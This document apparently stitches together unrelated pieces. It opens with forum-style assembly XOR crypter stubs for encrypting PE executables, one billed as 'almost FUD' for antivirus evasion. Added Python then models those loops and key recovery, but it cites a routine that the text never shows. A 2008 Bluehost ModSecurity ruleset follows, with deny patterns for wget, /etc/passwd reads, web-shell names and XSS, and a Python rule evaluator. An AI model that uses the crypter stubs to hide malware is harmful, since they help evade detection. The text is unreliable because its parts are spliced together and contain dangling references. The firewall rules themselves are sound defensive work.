CMP EAX,"end of your code to crypt"
JLE address of *theseadress

<<<<<<<<<<<
any kind of jump to your OEP


//////////////////////////////////////////////
OllyDbg Xor Packing Method
xor bl,bl
mov eax,(First)
inc bl
xor byte ptr ds:[eax],bl
inc eax
cmp eax,(Last)
jle (xor)
Push (OEP)
Call (JMP or CALL)

//////////////////////////////////////////////
A Simple x0r Packing [Works on All Files]
100040C2 PUSH EBP
100040C3 MOV EBP,88
100040C8 INC EBP
100040C9 SBB EBP,88
100040CF DEC EBP
100040D0 DEC EBP
100040D1 PUSH 88
100040D6 XOR EBP,88
100040DC TEST EBP,88
100040E2 NEG EBP
100040E4 ^ JLE SHORT stub.100040D6 ; JLE to the XOR address
100040E6 ^ JMP stub.<ModuleEntryPoint> ; JMP to the OEP address

Coded ByRodi



//////////////////////////////////////////////

new xor routine, almost FUD on some PE files !!!

start

add al,1a
add al,1
xor al,2
mov esi, *end of code which you wanna crypt*
dec al
dec al
xor byte ptr ds:[esi],al <<< addressImean
dec esi
dec esi
cmp esi, *start of code ya wanna crypt*
JGE addressImean
*any kind of jump*
call oep
ret

//////////////////////////////////////////////
Encryption Routine
mov eax,0040129c
xor byte [eax],0f
inc eax
cmp eax,0040E46C
jle [xor address]
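
What these stubs actually compute, as an added example in Python (not code from the page or from haZl0oh): stub_key() follows the NEG_NOT_ROR routine above instruction by instruction (MOV BL,88 read as hex 0x88, as OllyDbg shows immediates; AL is whatever the low byte of EAX holds when the stub runs, so it is passed in as a parameter), xor_loop() is the XOR BYTE PTR [EAX],BL / INC EAX / CMP / JLE pass, and the last two functions show the analyst's side: every variant listed above reduces to a single-byte XOR, so one known plaintext byte, or at most 256 guesses, recovers the key. The buffer it works on is a constructed byte string, not a real code section.

```python
"""Model of the single-byte XOR loops listed above, with key recovery."""


def ror8(x, n):
    """ROR on an 8-bit register."""
    n %= 8
    return ((x >> n) | (x << (8 - n))) & 0xFF


def neg8(x):
    """NEG on an 8-bit register (two's complement)."""
    return (-x) & 0xFF


def stub_key(al):
    """Key byte left in BL by the NEG_NOT_ROR routine:
        MOV BL,88 / NEG BL / ROR BL,4 / NOT BL / XOR BL,AL / NOT BL /
        ROR BL,4 / NEG BL / INC BL
    `al` is the low byte of EAX at the moment the stub runs.
    Assumption: the immediate 88 is hex, as in the OllyDbg listings."""
    bl = 0x88
    bl = neg8(bl)            # NEG BL
    bl = ror8(bl, 4)         # ROR BL,4
    bl = (~bl) & 0xFF        # NOT BL
    bl ^= al & 0xFF          # XOR BL,AL
    bl = (~bl) & 0xFF        # NOT BL  (the two NOTs cancel: NOT(NOT x ^ al) == x ^ al)
    bl = ror8(bl, 4)         # ROR BL,4
    bl = neg8(bl)            # NEG BL
    bl = (bl + 1) & 0xFF     # INC BL
    return bl


def xor_loop(data, key):
    """XOR BYTE PTR [EAX],BL / INC EAX / CMP EAX,END / JLE over the whole
    buffer. INC EAX / DEC EAX / INC EAX in the stub nets to a single INC,
    so this is a plain byte-by-byte XOR; running it twice restores the input."""
    return bytes(b ^ key for b in data)


def recover_key(ciphertext, known_plain, offset=0):
    """Analyst's side: one known plaintext byte at `offset` gives the key."""
    return ciphertext[offset] ^ known_plain


def brute_force_keys(ciphertext, predicate):
    """Analyst's side without a known byte: try all 256 keys and keep those
    whose output satisfies `predicate` (for example 'all printable ASCII')."""
    return [k for k in range(256) if predicate(xor_loop(ciphertext, k))]


def printable(buf):
    """True when every byte is printable ASCII."""
    return all(0x20 <= b < 0x7F for b in buf)


# Constructed stand-in for the region between TOP and END, not a real code section.
SAMPLE_CODE = b"region between TOP and END, as a constructed sample"


if __name__ == "__main__":
    key = stub_key(0x00)
    enc = xor_loop(SAMPLE_CODE, key)
    print("key from stub :", hex(key))
    print("round trip ok :", xor_loop(enc, key) == SAMPLE_CODE)
    print("recovered key :", hex(recover_key(enc, SAMPLE_CODE[0])))
    print("printable keys:", [hex(k) for k in brute_force_keys(enc, printable)])
```

With AL = 0 the whole NEG/ROR/NOT dance collapses to 0x88 + 1 = 0x89, which is why a detection signature on the loop shape rather than on the key value is the more durable approach.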

Bluehost mod_security ruleset

# modsec-00.00-defaults.conf
SecFilterEngine On
SecAuditEngine Off
SecFilterCheckUnicodeEncoding Off
SecFilterCheckCookieFormat On
SecFilterScanPOST On
SecFilterDefaultAction "deny,log,status:503"
SecFilterSelective REMOTE_ADDR "^127\.0\.0\.1$" nolog,allow

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-00.00-whitelists.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilter "_vti_bin" allow
SecFilterSelective THE_REQUEST "/fpsrvadm\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/fpremadm\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/admisapi/fpadmin\.htm" "nolog,pass"
SecFilterSelective THE_REQUEST "/scripts/Fpadmcgi\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/orders\.txt" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/form_results\.txt" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/registrations\.htm" "nolog,pass"
SecFilterSelective THE_REQUEST "/cfgwiz\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/authors\.pwd" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_bin/_vti_aut/author\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/administrators\.pwd" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/form_results\.htm" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/access\.cnf" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/register\.txt" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/registrations\.txt" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/service\.cnf" "nolog,pass"
SecFilterSelective THE_REQUEST "/service\.pwd" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/service\.stp" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/services\.cnf" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_bin/shtml\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/svcacl\.cnf" "nolog,pass"
SecFilterSelective THE_REQUEST "/users\.pwd" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/writeto\.cnf" "nolog,pass"
SecFilterSelective THE_REQUEST "/dvwssr\.dll" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/register\.htm" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_bin/" "nolog,pass"
SecFilterSelective REQUEST_URI "/mailman/admin/" "pass,nolog"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-00.general.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilter "\<.*php .*\(.*\)\;system\(.*\).*php*\>"
SecFilter "\<.*php .*\(.*\)\;(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|posix.pwd|dl|phpinfo)\(.*\).*php*\>"
SecFilter "wget\x20" "rev:1,severity:5,msg:'Attempted use of wGet'"
SecFilter "uname\x20-a" "rev:1,severity:5,msg:'Attempted use of uname -a'"
SecFilterSelective REQUEST_URI "gcc\x20" "rev:1,severity:5,msg:'Attempted use of gcc'"
SecFilter "Bcc:" "rev:1,severity:5,msg:'Attempted BCC spam'"
SecFilter "Bcc:\x20" "rev:1,severity:5,msg:'Attempted BCC spam'"
SecFilterSelective ARG_server_inc "(\.\.|(http|https|ftp)\:/)" "rev:1,severity:5,msg:'Attempted RFI'"
SecFilterSelective THE_REQUEST "system\(" "rev:1,severity:5,msg:'Attempted use of system()'"
SecFilterSelective THE_REQUEST "exec\(" "rev:1,severity:5,msg:'Attempted use of exec()'"
SecFilterSelective THE_REQUEST "popen\(" "rev:1,severity:5,msg:'Attempted use of popen()'"
SecFilterSelective THE_REQUEST "passthru\(" "rev:1,severity:5,msg:'Attempted use of passthru()'"
SecFilterSelective THE_REQUEST "albacrew"
SecFilterSelective ARG_dir[inc] "(\.\.|(http|https|ftp)\:/)" "rev:1,severity:5,msg:'RFI: dir[inc]=http'"
SecFilterSelective ARG__PHPLIB[libdir] "(\.\.|(http|https|ftp)\:/)" "rev:1,severity:5,msg:'RFI: PHPLIB[libdir]'"
SecFilterSelective REQUEST_URI "/\.htgroup" "rev:1,severity:5,msg:'Direct read of .htgroup'"
SecFilterSelective REQUEST_URI "/\.htaccess" "rev:1,severity:5,msg:'Direct read of .htaccess'"
SecFilterSelective REQUEST_URI "cd\.\." "rev:1,severity:5,msg:'Possible directory traversal attempt'"
SecFilterSelective THE_REQUEST "///cgi-bin"
SecFilterSelective THE_REQUEST "/cgi-bin///"
SecFilterSelective REQUEST_URI "/~root" "rev:1,severity:5,msg:'Restricted userdir: root'"
SecFilterSelective REQUEST_URI "/~ftp" "rev:1,severity:5,msg:'Restricted userdir: ftp'"
SecFilterSelective REQUEST_URI "/htgrep" log,pass
SecFilterSelective REQUEST_URI "/\.history" "rev:1,severity:5,msg:'Restricted file: .history'"
SecFilterSelective REQUEST_URI "/\.bash_history" "rev:1,severity:5,msg:'Restricted file: .bash_history'"
SecFilterSelective REQUEST_URI "/~nobody" "rev:1,severity:5,msg:'Restricted homedir: nobody'"
SecFilterSelective THE_REQUEST "<script"
SecFilterSelective REQUEST_URI "cmd=cd\x20/var"
SecFilterSelective ARG_dir "(http|https|ftp)\:/" "rev:1,severity:5,msg:'RFI dir'"
SecFilterSelective REQUEST_URI "\?STRENGUR"
SecFilterSelective REQUEST_URI "/etc/motd"
SecFilterSelective REQUEST_URI "/etc/passwd"
SecFilterSelective THE_REQUEST "/conf/httpd\.conf"
SecFilterSelective REQUEST_URI "/bin/ps"
SecFilterSelective THE_REQUEST "bin/tclsh"
SecFilterSelective THE_REQUEST "tclsh8\x20"
SecFilterSelective THE_REQUEST "udp\.pl"
SecFilterSelective THE_REQUEST "linuxdaybot\.txt"
SecFilterSelective REQUEST_URI "wget\x20"
SecFilterSelective THE_REQUEST "bin/nasm"
SecFilterSelective THE_REQUEST "nasm\x20"
SecFilterSelective REQUEST_URI "/usr/bin/perl"
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-(charset|width) "
SecFilterSelective THE_REQUEST "links (http|https|ftp)\:/"
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "cd\x20/(tmp|var/tmp|etc/httpd/proxy|dev/shm)"
SecFilterSelective THE_REQUEST "cd\.\."
SecFilterSelective THE_REQUEST "///cgi-bin"
SecFilterSelective THE_REQUEST "/cgi-bin///"
SecFilterSelective REQUEST_URI "/~named/"
SecFilterSelective REQUEST_URI "/~guest/"
SecFilterSelective REQUEST_URI "/~logs/"
SecFilterSelective REQUEST_URI "/~sshd/"
SecFilterSelective REQUEST_URI "/~ftp/"
SecFilterSelective REQUEST_URI "/~bin/"
SecFilterSelective REQUEST_URI "/~nobody/"
SecFilterSelective REQUEST_URI "/\.history"
SecFilterSelective REQUEST_URI "/\.bash_history"
SecFilterSelective REQUEST_URI "/nessus_is_probing_you_"
SecFilterSelective REQUEST_URI "/NessusTest"
SecFilter "javascript\://"
SecFilter "img src=javascript"
SecFilter "hdr=/"
SecFilterSelective REQUEST_METHOD "^POST$" "chain,rev:1,severity:5,msg:'POST with no Content-Length'"
SecFilterSelective HTTP_Content-Length "^$"
SecFilterSelective HTTP_Transfer-Encoding "!^$"
SecFilterSelective THE_REQUEST "\<IMG.*/\bonerror\b[\s]*=/Ri"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]text\/javascript/i"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]application\/x-javascript/i"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]text\/jscript/i"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]text\/vbscript/i"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]application\/x-vbscript/i"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]text\/ecmascript/i"
SecFilterSelective THE_REQUEST "STYLE[\s]*=[\s]*[^>]expression[\s]*\(/i"
SecFilterSelective THE_REQUEST "[\s]*expression[\s]*\([^}]}[\s]*<\/STYLE>/i"
SecFilterSelective THE_REQUEST "<!\[CDATA\[<\]\]>SCRIPT"
SecFilterSelective THE_REQUEST "Content-Type\:.*(<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>|onmouseover=|javascript\:)" "rev:1,severity:5,msg:'XSS: Content-Type'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-00.useragents.conf: 2008-05-12 11:55:38.000000000 

SecFilterSelective HTTP_USER_AGENT "S\.T\.A\.L\.K\.E\.R\." "rev:1,deny,id:HGUA200701,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "NeuralBot/0\.2" "rev:1,deny,id:HGUA200702,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "Kenjin Spider" "rev:1,deny,id:HGUA200703,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "WebVulnScan" "rev:1,deny,id:HGUA200704,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "Internet-exprorer" "rev:1,deny,id:HGUA200705,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "Mozilla.*Nessus" "rev:1,deny,id:HGUA200706,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "Indy Library" "rev:1,deny,id:HGUA200707,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "Faxobot" "rev:1,deny,id:HGUA200708,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT ".*SAFEXPLORER TL" "rev:1,deny,id:HGUA200709,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "^libwww-perl/.*" "chain,rev:1,id:HG2007072020,deny:503,severity:5,msg:'HG: libwww UA with RFI'"
SecFilterSelective REQUEST_URI "=(\.\.|http|https|ftp)\:"
SecFilterSelective HTTP_USER_AGENT "INTERNET EXPLOITER SUX" "rev:1,deny,id:HGUA200710,severity:2,msg:'Bad Script UA'"
SecFilterSelective HTTP_USER_AGENT "Windows-Update-Agent" "rev:1,deny,id:HGUA200711,severity:2,msg:'Bad Script UA'"
SecFilterSelective HTTP_USER_AGENT "PMAFind" "rev:1,deny,id:HGUA200712,severity:2,msg:'Bad Script UA'"
SecFilterSelective HTTP_USER_AGENT "Crescent Internet ToolPak" "rev:1,deny,id:HGUA200713,severity:2,msg:'Bad Script UA'"
SecFilterSelective HTTP_USER_AGENT "CopyRightCheck" "rev:1,deny,id:HGUA200714,severity:2,msg:'Copyright Bots'"
SecFilterSelective HTTP_USER_AGENT "CopyGuard" "rev:1,deny,id:HGUA200715,severity:2,msg:'Copyright Bots'"
SecFilterSelective HTTP_USER_AGENT "Digimarc WebReader" "rev:1,deny,id:HGUA200716,severity:2,msg:'Copyright Bots'"
SecFilterSelective HTTP_USER_AGENT "Web Downloader" "rev:1,deny,id:HGUA200717,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT WebZIP "rev:1,deny,id:HGUA200718,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT WebCopier "rev:1,deny,id:HGUA200719,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT Webster "rev:1,deny,id:HGUA200720,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT WebZIP "rev:1,deny,id:HGUA200721,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT WebStripper "rev:1,deny,id:HGUA200722,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "teleport pro" "rev:1,deny,id:HGUA200723,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT combine "rev:1,deny,id:HGUA200724,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "Black Hole" "rev:1,deny,id:HGUA200725,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "SiteSnagger" "rev:1,deny,id:HGUA200726,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "ProWebWalker" "rev:1,deny,id:HGUA200727,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "CheeseBot" "rev:1,deny,id:HGUA200728,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "hl_ftien_spider" "rev:1,deny,id:HGUA200729,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "Mozilla/4\.0 \(compatible\; MSIE 6\.0\; Windows NT 5\.1$" "rev:1,deny,id:HGUA200730,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "WebBandit" "rev:1,deny,id:HGUA200731,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "WEBMOLE" "rev:1,deny,id:HGUA200732,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "Telesoft*" "rev:1,deny,id:HGUA200733,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "WebEMailExtractor" "rev:1,deny,id:HGUA200734,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "CherryPicker*" "rev:1,deny,id:HGUA200735,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT NICErsPRO "rev:1,deny,id:HGUA200736,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "Advanced Email Extractor*" "rev:1,id:HGUA200737,deny,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT EmailSiphon "rev:1,deny,id:HGUA200738,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT Extractorpro "rev:1,deny,id:HGUA200739,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT webbandit "rev:1,deny,id:HGUA200740,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT EmailCollector "rev:1,deny,id:HGUA200741,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "WebEMailExtrac*" "rev:1,deny,id:HGUA200742,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT EmailWolf "rev:1,deny,id:HGUA200743,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "8484 Boston Project" "rev:1,deny,id:HGUA200734,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT ".*fantomBrowser" "rev:1,deny,severity:2,id:HGUA200744,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT ".*fantomCrew Browser" "rev:1,deny,id:HGUA200745,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "DTS Agent" "rev:1,deny,id:HGUA200746,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "POE-Component-Client" "rev:1,deny,id:HGUA200747,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "WISEbot" "rev:1,deny,id:HGUA200748,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "^Shockwave Flash" "rev:1,deny,id:HGUA200749,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "Missigua" "rev:1,deny,id:HGUA200750,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "^www\.weblogs\.com" "rev:1,deny,id:HGUA200751,severity:2,msg:'Comment/Referrer Spam UA'"
SecFilterSelective HTTP_USER_AGENT "compatible \; MSIE" "rev:1,deny,id:HGUA200752,severity:2,msg:'Comment/Referrer Spam UA'"
SecFilterSelective HTTP_USER_AGENT "<(.|\s|\n)?(script|about|applet|activex|chrome|object)(.|\s|\n)?>.*<(.|\s|\n)?(script|about|applet|activex|chrome|object)" "rev:1,deny,severity:2,msg:'UA Field XSS Exploit Attempt'"
SecFilterSelective HTTP_USER_AGENT "(<\?php|<[[:space:]]*\?[[:space:]]*php)" "rev:1,deny,id:HGUA200754,severity:2,msg:'UA Field Exploit Attempt'"
SecFilterSelective HTTP_USER_AGENT ".*HTTP_GET_VARS" "rev:1,deny,severity:2,id:HGUA200755,msg:'UA Field Exploit Attempt'"
SecFilterSelective HTTP_USER_AGENT "\.\./\.\." "rev:1,deny,severity:2,id:HGUA200756,msg:'UA Field Recursion Attack'"
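
How a few of the SecFilterSelective rules above behave against request fields, as an added example in Python (not part of the Bluehost files or of ModSecurity itself): parse_rules() reads rule lines copied verbatim from the sections above, evaluate() applies each pattern with Python's re module to the named field of a request record and walks the rules in file order, and the sample requests are constructed. Two assumptions, because the 1.x engine's exact behaviour is not stated on the page: patterns match case-insensitively, and a matching deny (the default action from modsec-00.00-defaults.conf) or allow rule ends processing while a pass rule only records the hit. Chained rules are skipped.

```python
"""Evaluate SecFilterSelective rules from the ruleset above against requests."""
import re

# SecFilterDefaultAction from modsec-00.00-defaults.conf above: a rule with
# no explicit action list denies the request.
DEFAULT_ACTIONS = "deny,log,status:503"

# Rules copied verbatim from the sections above.
RULES_TEXT = r'''
SecFilterSelective REQUEST_URI "/mailman/admin/" "pass,nolog"
SecFilterSelective REQUEST_URI "/etc/passwd"
SecFilterSelective REQUEST_URI "wget\x20"
SecFilterSelective THE_REQUEST "cd\x20/(tmp|var/tmp|etc/httpd/proxy|dev/shm)"
SecFilterSelective REQUEST_URI "/\.bash_history" "rev:1,severity:5,msg:'Restricted file: .bash_history'"
SecFilterSelective HTTP_USER_AGENT "Mozilla.*Nessus" "rev:1,deny,id:HGUA200706,severity:2,msg:'Exploit UA'"
'''

# SecFilterSelective TARGET[|TARGET...] "PATTERN" ["ACTIONS" | ACTIONS]
RULE_RE = re.compile(
    r'^SecFilterSelective\s+(?P<targets>\S+)\s+'
    r'"(?P<pattern>(?:[^"\\]|\\.)*)"'                      # backslashes kept for re
    r'(?:\s+(?:"(?P<qactions>[^"]*)"|(?P<actions>\S+)))?\s*$'
)


def parse_rules(text):
    """Turn rule lines into dicts with a compiled regex and a verdict."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if not m:
            raise ValueError("unparsed rule: " + line)
        actions = m.group("qactions") or m.group("actions") or DEFAULT_ACTIONS
        msg = re.search(r"msg:'([^']*)'", actions)
        tokens = {t.strip() for t in re.sub(r"msg:'[^']*'", "", actions).split(",")}
        if "chain" in tokens:
            continue          # a chained rule needs the following line too; not modelled
        if "allow" in tokens:
            verdict = "allow"
        elif "pass" in tokens:
            verdict = "pass"
        else:
            verdict = "deny"  # explicit deny, or inherited from DEFAULT_ACTIONS
        rules.append({
            "targets": m.group("targets").split("|"),
            "pattern": m.group("pattern"),
            "regex": re.compile(m.group("pattern"), re.IGNORECASE),  # assumption: case-insensitive
            "verdict": verdict,
            "msg": msg.group(1) if msg else "",
        })
    return rules


def evaluate(rules, request):
    """Walk the rules in file order against one request record.

    Returns (decision, fired): fired lists (pattern, verdict, msg) for every
    rule that matched. A deny or allow match ends processing; a pass match
    is recorded and the walk continues; no deny means the request is allowed.
    """
    fired = []
    for rule in rules:
        for target in rule["targets"]:
            if rule["regex"].search(request.get(target, "")):
                fired.append((rule["pattern"], rule["verdict"], rule["msg"]))
                if rule["verdict"] in ("deny", "allow"):
                    return rule["verdict"], fired
                break
    return "allow", fired


def make_request(method, uri, user_agent="Mozilla/5.0"):
    """Build the three request fields the rules above look at."""
    return {
        "REQUEST_URI": uri,
        "THE_REQUEST": f"{method} {uri} HTTP/1.1",
        "HTTP_USER_AGENT": user_agent,
    }


# Constructed requests, not taken from any log.
SAMPLE_REQUESTS = {
    "passwd_read": make_request("GET", "/view.php?file=/etc/passwd"),
    "tmp_cd": make_request("GET", "/img.php?c=cd /tmp"),
    "mailman": make_request("GET", "/mailman/admin/listname"),
    "scanner_ua": make_request("GET", "/index.html", "Mozilla/4.0 (compatible; Nessus)"),
    "normal": make_request("GET", "/about.html"),
}


if __name__ == "__main__":
    rules = parse_rules(RULES_TEXT)
    for name, req in SAMPLE_REQUESTS.items():
        decision, fired = evaluate(rules, req)
        print(f"{name:12s} -> {decision:5s} {[f[0] for f in fired]}")
```

Note that the rules are applied to the fields as given; the real engine first URL-decodes and normalises the request, so a test harness like this one should be fed decoded values, as the samples here are.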

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-01.forms.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARGS_VALUES "\n[[:space:]]*(to|bcc|cc)[[:space:]]*:.*@" "rev:1,id:HG2007063002,severity:5,msg:'HG: php Mail Injection attempt'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-01.fraud.conf: 2008-03-30 18:39:36.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/(.+)online\.lloydstsb\.co\.uk/" "rev:1,id:HG2007070601,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "CentroDeSeguridadVisa_Particulares\.com" "rev:1,id:HG2007070602,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "/wellsfargo.com\.htm" "rev:1,id:HG2007070603,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "/(.+)royalbank\.com/" "rev:1,id:HG2007070606,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "/(.+)online\.lloydstsb\.co\.uk/" "rev:1,id:HG2007070607,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "/(.+)bankofamerica\.com/" "rev:1,id:HG2007070608,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "/(.+)paypal\.com/" "rev:1,id:HG2008030101,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REMOTE_ADDR "195\.161\.119\.{1,3}$" "rev:1,msg:'Russian chat.ru fraud'"
SecFilterSelective REMOTE_HOST "\.chat\.ru$" "rev:1,msg:'Russian chat.ru fraud'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-01.iframes.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective HTTP_REFERER|REMOTE_HOST "simocrogger\.ws" "rev:1,severity:5,deny:503,msg:'IFRAME: Malicious (flash)'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-01.shells.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/(cse|cmd)\.(c|dat|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|php|asp)\?"
SecFilterSelective THE_REQUEST "/(cse|cmd)\.(c|dat|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|php|asp) "
SecFilterSelective REQUEST_URI "/terminatorX-exp.*\.(gif|jpe?g|txt|bmp|php|png)\?"
SecFilterSelective REQUEST_URI "/\.it/viewde"
SecFilterSelective REQUEST_URI "/cmd\?&(command|cmd)="
SecFilterSelective REQUEST_URI "/cmd\.php\.ns\?&(command|cmd)="
SecFilterSelective REQUEST_URI "/cmd\.(php|dat)\?&(command|cmd)="
SecFilterSelective REQUEST_URI "/(a|ijoo|oinc|s|sep|pro18|shell|(o|0|p)wn(e|3)d)\.(c|dat|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp|php|asp).\?&(cmd|command)="
SecFilterSelective REQUEST_URI "/(new(cmd|command)|(cmd|command)[0-9]+|pro18|shell|sh|bash|get|root|spy|nmap|asc|lila)\.(c|dat|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp|php|asp)\?"
SecFilterSelective REQUEST_URI "/[a-z]?(cmd|command)[0-9]?\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/(gif|jpe?g|ion|lala|shell|phpshell)\.ph(p(3|4)?|tml)\?"
SecFilterSelective REQUEST_URI "/tool[12][0-9]?\.(ph(p(3|4)?|tml)|js)\?"
SecFilterSelective REQUEST_URI "perl (xpl\.pl|kut|viewde|httpd\.txt)"
SecFilterSelective THE_REQUEST "\./xkernel\;"
SecFilterSelective THE_REQUEST "/kaiten\.c"
SecFilterSelective REQUEST_URI "/mampus\?&(cmd|command)"
SecFilterSelective REQUEST_URI "perl .*\.pl(\s|\t)*\;"
SecFilterSelective REQUEST_URI "\;(\s|\t)*perl .*\.pl"
SecFilterSelective REQUEST_URI "/tool(12)?[0-9]?\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
SecFilterSelective REQUEST_URI "/tool\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
SecFilterSelective REQUEST_URI "/tool25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
